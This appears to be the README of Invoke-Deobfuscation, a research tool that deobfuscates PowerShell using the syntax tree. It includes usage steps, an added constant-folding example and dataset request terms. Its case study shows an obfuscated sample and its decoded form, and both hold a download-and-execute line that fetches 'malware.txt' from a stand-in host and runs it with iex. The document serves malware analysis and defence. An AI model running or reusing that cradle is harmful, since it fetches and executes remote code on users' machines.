Environment
How to use it?
```shell
git clone https://gitee.com/snowroll/invoke-deobfuscation
cd invoke-deobfuscation/Code
pwsh   # Linux or macOS
Import-Module ./Invoke-DeObfuscation.psd1
DeObfuscatedMain -ScriptPath0 ../Data/demo.ps1
```
Case Study
demo.ps1
```powershell
Ie`X ("{2}{0}{1}" -f 'ost h', 'ello', 'write-h')
$xdjmd = 'aAB0AHQAcABzADoALwAvAHQAZQBzAHQALgBjAG'
$lsffs = '8AbQAvAG0AYQBsAHcAYQByAGUALgB0AHgAdAA='
$sdfs = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($xdjmd + $lsffs))
.($psHoME[4]+$PShOmE[30]+'x') (Ne`W-oB`JeCt Net.Web`C`lient).downloadstring($sdfs)
```
Result
```powershell
Write-Host hello
$var0 = 'aAB0AHQAcABzADoALwAvAHQAZQBzAHQALgBjAG'
$var1 = '8AbQAvAG0AYQBsAHcAYQByAGUALgB0AHgAdAA='
$var2 = 'https://test.com/malware.txt'
.('iex') (New-Object net.webclient).downloadstring('https://test.com/malware.txt')
```
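To illustrate the kind of AST-based constant folding that turns the first line of the demo into `Write-Host hello`, here is an added example written for this page (it is not Invoke-Deobfuscation's code and the function names `Get-ConstantString` and `Invoke-ConstantFolding` are hypothetical). It uses the PowerShell engine's own `System.Management.Automation.Language.Parser`, walks the AST for `-f` and `+` expressions whose operands are all string literals, evaluates them, and rewrites each outermost one as a single-quoted literal, leaving the rest of the script untouched. Variable propagation, Base64 decoding and backtick removal, which the full result above also shows, are separate passes not covered here.

```powershell
using namespace System.Management.Automation.Language

# Added example, not the project's own code; helper names are hypothetical.
# Returns the string value of an expression built only from string literals,
# '+' concatenation and '-f' formatting; returns $null if it is not constant.
function Get-ConstantString {
    param([Ast]$Node)
    switch ($Node) {
        { $_ -is [StringConstantExpressionAst] } { return $_.Value }
        { $_ -is [ExpandableStringExpressionAst] -and $_.NestedExpressions.Count -eq 0 } {
            return $_.Value
        }
        { $_ -is [ParenExpressionAst] } {
            # (expr) parses as a one-element pipeline wrapping the expression
            $elems = $_.Pipeline.PipelineElements
            if ($elems.Count -eq 1 -and $elems[0] -is [CommandExpressionAst]) {
                return Get-ConstantString $elems[0].Expression
            }
            return $null
        }
        { $_ -is [BinaryExpressionAst] } {
            $left = Get-ConstantString $_.Left
            if ($null -eq $left) { return $null }
            if ($_.Operator -eq [TokenKind]::Plus) {
                $right = Get-ConstantString $_.Right
                if ($null -eq $right) { return $null }
                return $left + $right
            }
            if ($_.Operator -eq [TokenKind]::Format) {
                # "{1}{0}" -f 'a','b': the right side is an array literal of operands
                $operands = if ($_.Right -is [ArrayLiteralAst]) { $_.Right.Elements } else { @($_.Right) }
                $values = foreach ($op in $operands) {
                    $v = Get-ConstantString $op
                    if ($null -eq $v) { return $null }
                    $v
                }
                return $left -f [object[]]$values
            }
            return $null
        }
    }
    return $null
}

# Rewrites every outermost constant-foldable expression in $Script as a
# single-quoted literal and returns the rewritten script text.
function Invoke-ConstantFolding {
    param([Parameter(Mandatory)][string]$Script)
    $tokens = $null; $errors = $null
    $ast = [Parser]::ParseInput($Script, [ref]$tokens, [ref]$errors)
    if ($errors.Count -gt 0) {
        throw ("Parse errors: " + (($errors | ForEach-Object Message) -join '; '))
    }
    $foldable = @($ast.FindAll({ param($n)
            $n -is [BinaryExpressionAst] -and $null -ne (Get-ConstantString $n) }, $true))
    # Keep only nodes with no foldable ancestor, so each region is replaced once.
    $outermost = foreach ($n in $foldable) {
        $p = $n.Parent; $nested = $false
        while ($null -ne $p) {
            if ($foldable -contains $p) { $nested = $true; break }
            $p = $p.Parent
        }
        if (-not $nested) { $n }
    }
    # Replace from the end of the text backwards so earlier offsets stay valid.
    $sb = [System.Text.StringBuilder]::new($Script)
    foreach ($n in ($outermost | Sort-Object { $_.Extent.StartOffset } -Descending)) {
        $literal = "'" + (Get-ConstantString $n).Replace("'", "''") + "'"
        $start = $n.Extent.StartOffset
        $null = $sb.Remove($start, $n.Extent.EndOffset - $start).Insert($start, $literal)
    }
    return $sb.ToString()
}

# Constructed sample: the first statement of demo.ps1 above.
$sample = @'
Ie`X ("{2}{0}{1}" -f 'ost h', 'ello', 'write-h')
'@
Invoke-ConstantFolding -Script $sample
```

Running it on the sample folds the format expression into `'write-host hello'` while the `$xdjmd + $lsffs` and `$psHoME[...]` expressions of the full demo are left alone because their operands are variables, not literals. Working on the AST rather than with regular expressions is what keeps the rewrite semantics-preserving: only expressions the parser proves to be pure string constants are touched, and the surrounding command text is reproduced byte for byte.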
DataSet Request
If you want the dataset (3346 highly obfuscated samples), please send me an email. My email address is chaihuajun@qianxin.com. There are some requirements for the email as follows.
- You need to send me an email with a copy to both my mentor yinglingyun@qianxin.com and your mentor.
- In the body of the email, you need to state the purpose of the dataset request and the use of the dataset.
- Moreover, you need to clearly indicate that the results generated by the dataset will cite our paper.
The full dataset is not public. If you would like to collaborate on research, please feel free to contact us.
Citation
```bibtex
@inproceedings{chai2022invoke,
  title={Invoke-Deobfuscation: AST-Based and Semantics-Preserving Deobfuscation for PowerShell Scripts},
  author={Chai, Huajun and Ying, Lingyun and Duan, Haixin and Zha, Daren},
  booktitle={2022 52nd Annual IEEE/IFIP International Conference on Dependable Systems and Networks (DSN)},
  pages={295--306},
  year={2022},
  organization={IEEE}
}
```